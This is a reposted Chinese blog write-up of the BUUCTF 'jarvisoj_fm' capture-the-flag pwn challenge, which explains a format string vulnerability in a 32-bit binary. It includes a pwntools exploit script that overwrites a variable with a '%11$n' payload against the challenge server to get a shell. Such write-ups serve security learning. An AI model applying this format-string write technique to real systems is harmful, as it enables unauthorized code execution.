BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞
生活随笔
收集整理的這篇文章主要介紹了
BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
簡單的格式化字符串漏洞題目
32位,開啟了canary和nx保護
知道以上條件就可以計算偏移了
得到偏移為11
from pwn import *r=remote('node3.buuoj.cn',25582) x_addr=0x804A02Cpayload=p32(x_addr)+"%11$n"r.sendline(payload)r.interactive()payload=p32(x_addr)+"%11$n"
因為要使x的值為4,寫入的數據由%11$n前面的參數的長度決定,而p32(x_addr),正好是4位,不需要添a來補齊位數就可以直接利用,將x參數的地址的值改成了4,獲取了shell
總結
以上是生活随笔為你收集整理的BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: fastbin attack攻击中关于
- 下一篇: buuctf(misc) FLAG [L